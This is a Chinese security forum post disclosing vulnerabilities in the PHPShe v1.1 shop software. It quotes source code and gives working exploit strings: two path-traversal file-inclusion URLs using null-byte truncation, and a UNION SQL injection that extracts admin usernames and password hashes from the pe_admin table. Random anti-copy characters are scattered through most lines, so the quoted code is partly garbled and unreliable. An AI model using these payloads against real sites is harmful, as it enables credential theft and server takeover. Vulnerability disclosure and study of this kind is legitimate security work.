找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2190|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
* l, T5 e1 g( H' \3 t& J- G/* Phpshe v1.1 Vulnerability
- l2 w1 C( |+ Q$ A/* ========================
7 O: E) a" M' C; W4 L1 m/* By: : Kn1f3% C( p$ {) N( ?6 |8 M3 _
/* E-Mail : 681796@qq.com
4 m; T) l! p! F6 A+ c/*******************************************************/
# e$ M1 j- H5 _4 m0×00 整体大概参数传输
) t# s$ C& K6 K7 r  Q, A
) M$ V0 ~( {# g3 `, s. J+ G* o- l: g5 g: r5 p) F

9 j# w. [' }) g//common.php
3 G/ x- u1 y$ S$ H! O7 jif (get_magic_quotes_gpc()) {
4 n% |( }' O* u5 B' V!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
! |# Q& l. ]7 B! p* v" U!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');. f8 c3 `  \/ L# v) w4 Z
}
# s5 u3 j' l( r: C1 z, O# Z! Celse {, m0 ^8 Q0 v0 X" B# j
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
, ~! D/ A9 L9 X" h+ O" n6 Y!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');" Y6 B& J- `" g) F- a, |
}
. Y- d/ ^1 g* K1 g% z6 ~9 wsession_start();% B% l5 `) \2 {1 H
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
% b, \! c0 C2 K  `5 Q. M& Q& }!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
. y0 l) P( [4 k$ c& S! `$ d, Y: j
0×01 包含漏洞1 \3 V) _5 m6 H5 L
" ?- g; M4 y* _, X3 O1 r% x

# Z; \; A3 ]  A5 {- e1 ~. J; y5 W//首页文件
/ h. z, J* K1 ?% J' P% V, R# P<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);' q/ P# @4 m! c8 x
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞) F; k& o  f5 p$ u3 j2 f9 d+ x
pe_result();
5 @2 z) a1 v- J' ?% B+ U5 m% [5 T6 ??>) N/ w2 X: A+ T$ S- |
//common 文件 第15行开始
/ t/ q8 {# v$ J8 c8 nurl路由配置
* O1 b6 m1 [) q5 Y0 x4 h: s9 m9 `$module = $mod = $act = 'index';
" W) E7 R+ B' n+ F; b$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
1 k) k! e3 F( [! J$ d& b$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);. ]; }7 F- o- F; {" b* h  B+ y
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);. ~! U) D" i7 F% H, S
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
; _3 n% N% }. n. h+ i

; G; M4 I1 `3 _7 c

- q/ U2 Q/ V  k. J# B 0×02 搜索注入, k! H+ Y. g. O( n
. S  t( U7 ?% k/ `( U, ~/ b# O
<code id="code2">

//product.php文件7 V. ^& [4 i& F/ X( y
case 'list':. z7 X( B; N7 Q. e) X5 }9 S
$category_id = intval($id);) J6 P) ~0 E: ~3 X$ [
$info = $db->pe_select('category', array('category_id'=>$category_id));! F5 _6 j/ _: e$ `! b; d+ a3 w
//搜索
0 f9 n5 d) c9 L. V; E2 I$sqlwhere = " and `product_state` = 1";
/ l- P$ N! I2 W# B; f  ope_lead('hook/category.hook.php');
1 y: `/ r7 x1 J7 nif ($category_id) {7 ~! K; [4 P2 H
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
/ P2 g7 P  w9 H* C6 U/ N) q}
" {% e3 W8 m0 r/ k$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
' c" c! m1 _( q* }1 d, ?if ($_g_orderby) {9 K% ]- b2 T+ {
$orderby = explode('_', $_g_orderby);) H6 T" I. |5 T  M2 ~
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
$ R$ b. M3 Y+ h- O% a1 W% R}" E2 m+ L/ Y0 a' x5 k8 [2 [' R/ i- ?, ^
else {4 g' j) k$ \7 b; f2 W9 ^/ M2 H
$sqlwhere .= " order by `product_id` desc";
1 N8 `( r& i5 e* I3 d}
: z+ m, }2 H& Q7 o8 K- \. s5 U$ U. S$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
% I3 b9 A3 c# S# V//热卖排行
. x* y; }) {. M, Y* x; @. ]1 p$product_hotlist = product_hotlist();5 w3 `) `: ?- }  `. D( T" ^
//当前路径
6 H6 O) G' ~3 f. b9 P4 H2 ]" _+ |$nowpath = category_path($category_id);/ {& C5 U% G% W
$seo = pe_seo($info['category_name']);% Y/ P! |2 I/ s: R7 t: x; g
include(pe_tpl('product_list.html'));
, S2 ]' j  M/ f% V3 m//跟进selectall函数库) q. E! v- ]) i# |$ X5 {, d
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())% f. \# }- K7 f3 E! U- \3 g+ \
{
. ^% X) D& z8 r$ D* e//处理条件语句  o: G% w9 U2 S* z, S- ^
$sqlwhere = $this->_dowhere($where);
/ \1 ~7 U/ h; E: w7 C, i$ }return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
( a, Z0 x- Y4 r* @! |" j}
7 E4 y( h/ x7 K& B//exp
9 s% o! Y# w: [& q, Qproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
$ {! ^, l$ G! j8 ?) F( ?. O

</code>5 F6 w' v6 S5 ]9 B4 Y+ y

! ^3 c3 q- ^  h) r0×03 包含漏洞2
. F* z, `& Q- O0 f( n6 Y5 i 2 u+ s$ I) d, }# g% ^
<code id="code3">

//order.php

case 'pay':


  Y+ l) X  f0 A; j4 c$order_id = pe_dbhold($_g_id);

* P! o- J+ b& c+ r( `. M7 a
$cache_payway = cache::get('payway');

# v4 J( _7 w* e: z0 ^
foreach($cache_payway as $k => $v) {


: `* _  W# W5 Q: k( w$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


! J4 Z% P: K7 ?: S5 wif ($k == 'bank') {


/ S5 ]( K) O# W. g6 @9 X" {$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

: B9 K9 H1 l9 v; n3 N
}


" e7 t1 U5 H& X. {}


, g% Z, V' C' g) l0 W3 V& _$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


7 F& D- b4 A* b! f: E. h!$order['order_id'] && pe_error('订单号错误...');


7 U2 ^  ^9 ~  A& iif (isset($_p_pesubmit)) {


% B4 M- ~; E" |: O" x9 ?- z5 cif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

6 O1 o2 u4 M1 @5 y1 g8 [  l
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

# \. S, I6 E6 Z0 G/ \$ e0 s0 d( C
foreach ($info_list as $v) {


5 O" n/ H9 }9 b$order['order_name'] .= "{$v['product_name']};";5 S0 o3 v5 T+ \


* b& G+ `+ y) _6 T8 T}

5 a2 y+ p6 t2 {
echo '正在为您连接支付网站,请稍后...';


/ a0 d/ @* I& G* `: {: Zinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


2 X! \/ P" ?% \}//当一切准备好的时候就可以进行"鸡肋包含了"


, A& `- O) e, k& B' eelse {

) o, V) u2 ?" @- d; B8 t; o
pe_error('支付错误...');

) y+ T$ I0 g) C
}

+ e' a, p% L" X; x2 \  X# u5 n
}


( f; l  Y4 ?7 o) \& A, j/ s" s$seo = pe_seo('选择支付方式');

, O# ?1 k. r: z' L4 ~
include(pe_tpl('order_pay.html'));


. S/ E% H- N3 K7 Sbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
$ s& g$ t- j3 j5 g7 q0 Ihttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表